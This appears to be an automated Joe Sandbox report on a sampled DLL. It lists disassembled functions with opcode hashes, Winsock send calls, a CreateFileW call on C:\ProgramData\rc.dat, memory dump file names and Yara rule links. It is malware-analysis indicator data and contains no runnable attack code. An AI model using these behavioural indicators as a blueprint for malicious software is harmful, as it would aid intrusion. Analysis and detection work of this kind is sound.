Opcode ID: d48c0b7cda7f13df628c28f8c26059318ce12f75b76e07220ab2295fce538833
Instruction ID: 822dc3e4cd678ea78fc306979d2c4513e05703292fbd80e1e7d0e6cc7c23a3dc
Opcode Fuzzy Hash: d48c0b7cda7f13df628c28f8c26059318ce12f75b76e07220ab2295fce538833
Instruction Fuzzy Hash: BEE09B729001186F8650E599D8488F777FCEB0F376B400616F5D9C3540EA34D95897F5

Function 6CEB5AD9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB5ADE

Strings

qrstuvwxyzeioubd, xrefs: 6CEB5B1C, 6CEB5B1F

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: qrstuvwxyzeioubd
API String ID: 3519838083-835419285
Opcode ID: 2d80421a36b8d430e294dfb28d9fd49900e9ded50fdc65d9c443d57af3a35b77
Instruction ID: f639772d8bb3cc800c7e1ad842e14b19e54494e26113f831843f3c85a9c85363
Opcode Fuzzy Hash: 2d80421a36b8d430e294dfb28d9fd49900e9ded50fdc65d9c443d57af3a35b77
Instruction Fuzzy Hash: 219140B6C0060D9ACF04DFE4CA44AFEB7B8AF19218F24415ED905B7750EB39964DCBA1

Function 6CEB1F2E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB1F33

Strings

oubd, xrefs: 6CEB1F4C, 6CEB1F99, 6CEB1FB4

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: H_prolog
String ID: oubd
API String ID: 3519838083-221200022
Opcode ID: 410aa3e5ab9965250faed138fa39001c0f7f80808bba279afe5a2723833c897d
Instruction ID: 387dcbbfd352859795e15e4d6091cd6670c9d8aa7958d74d0cbba65895e6e1c6
Opcode Fuzzy Hash: 410aa3e5ab9965250faed138fa39001c0f7f80808bba279afe5a2723833c897d
Instruction Fuzzy Hash: 0C217F75600605DBCB14CFA5C241AAAB7B1FF44768F35825DE8556BB41DB30EE06CB90

Function 6CF0A550 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 4fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(C:\ProgramData\rc.dat), ref: 6CF0E196

Strings

C:\ProgramData\rc.dat, xrefs: 6CF0A550

Memory Dump Source

Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: C:\ProgramData\rc.dat
API String ID: 823142352-1224088808
Opcode ID: 2fb519d456c48fce670b4a8318046a082372f4e73051948024415bc3981194d4
Instruction ID: 8885737e6dc72afb3d8f600e5a0814f3f1f60ccf86759ae3eb10def148027d74
Opcode Fuzzy Hash: 2fb519d456c48fce670b4a8318046a082372f4e73051948024415bc3981194d4
Instruction Fuzzy Hash: C2A00277388044C696E896D8452860A2A307657B967114941F45191C418A914501B672

Function 6CEB33A7 Relevance: 3.1, APIs: 2, Instructions: 105networkCOMMON

Download Yara Rule

APIs

Part of subcall function 6CEB332E: WSASetLastError.WS2_32(00000000,?,00000045,00000000,00000065,?,6CEB3A3A,00000001,00000000,?,?,6CEBBA59,?,?,6CEBBA59), ref: 6CEB333B
Part of subcall function 6CEB332E: WSASend.WS2_32(00000065,00000001,?,00000000,6CEBBA59,00000000,00000000), ref: 6CEB3359

WSASetLastError.WS2_32 ref: 6CEB3469
select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 6CEB347E

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Sendselect
String ID:
API String ID: 2958345159-0
Opcode ID: 52ebe6cd2a31cc818c7e30d1432d6c9a3ce79d51949b35c0875f00c2f08e2c85
Instruction ID: c324431c536644433b22237e80e855aada1964d33dc3fe5a5bc86f35bf1c7b03
Opcode Fuzzy Hash: 52ebe6cd2a31cc818c7e30d1432d6c9a3ce79d51949b35c0875f00c2f08e2c85
Instruction Fuzzy Hash: 6131C371605305AFE7008F65CA02BAB7BF4EF4536CF24462DF8A4A7680EF35D5098B91

Function 6CEB332E Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,00000045,00000000,00000065,?,6CEB3A3A,00000001,00000000,?,?,6CEBBA59,?,?,6CEBBA59), ref: 6CEB333B
WSASend.WS2_32(00000065,00000001,?,00000000,6CEBBA59,00000000,00000000), ref: 6CEB3359

Part of subcall function 6CEBE8BD: WSAGetLastError.WS2_32(00000000,?,?,?,6CEB3747,00000000), ref: 6CEBE8C8

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: ErrorLast$Send
String ID:
API String ID: 1282938840-0
Opcode ID: 392c4665902d213a33f4054b81a8b9a0308c0fbc43f443decc8e889c0bd42223
Instruction ID: a34516960f3cc3c2ad0006324c7f7f153c5e7a198b868c8fadcd0d1f1de193c8
Opcode Fuzzy Hash: 392c4665902d213a33f4054b81a8b9a0308c0fbc43f443decc8e889c0bd42223
Instruction Fuzzy Hash: 8301F731605218FBEF208A90CD86FAB37B8EF46779F340159F524AB6C0DF7599008791

Function 6CEB2D13 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 6CEB2D18
DeleteCriticalSection.KERNEL32(?,?,?,?,6CEB2CF9,00000000,?,?,6CEB9994), ref: 6CEB2D5B

Memory Dump Source

Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd

Yara matches

Similarity

API ID: CriticalDeleteH_prologSection
String ID:
API String ID: 3454226681-0
Opcode ID: 066d739eb3a6077976c59d560b07bc4a228af1f553f701b56f2f35e207daa7dd
Instruction ID: e0a9013bdd8f20bcb75e8d9fb19b6cc76afc673abcdb42531252c926aa104201
Opcode Fuzzy Hash: 066d739eb3a6077976c59d560b07bc4a228af1f553f701b56f2f35e207daa7dd
Instruction Fuzzy Hash: D301AD36B01A108FC715CF68C508BAAB3B0FF89715B21865EE426A7B10CB70F9028F91

Function 6CF0A5B0 Relevance: 1.6, APIs: 1, Instructions: 129fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 6CF3FEF4

Memory Dump Source

Source File: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true

Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
